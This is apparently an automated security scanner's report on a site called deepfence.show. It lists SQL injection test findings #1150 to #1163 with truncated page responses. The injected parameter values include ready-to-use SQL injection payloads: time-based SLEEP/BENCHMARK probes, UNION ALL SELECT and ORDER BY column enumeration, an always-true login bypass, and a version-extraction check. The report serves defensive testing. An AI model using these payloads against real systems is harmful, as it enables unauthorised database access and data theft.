src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1150\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1151\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1152\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1153\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# +benchmark(3200,SHA1(1))+'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1154\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1155\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# +\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1156\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ,\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1157\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1158\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1159Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1160\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1161\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1162\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# and (select substring(@@version,3,1))='S'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1163\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 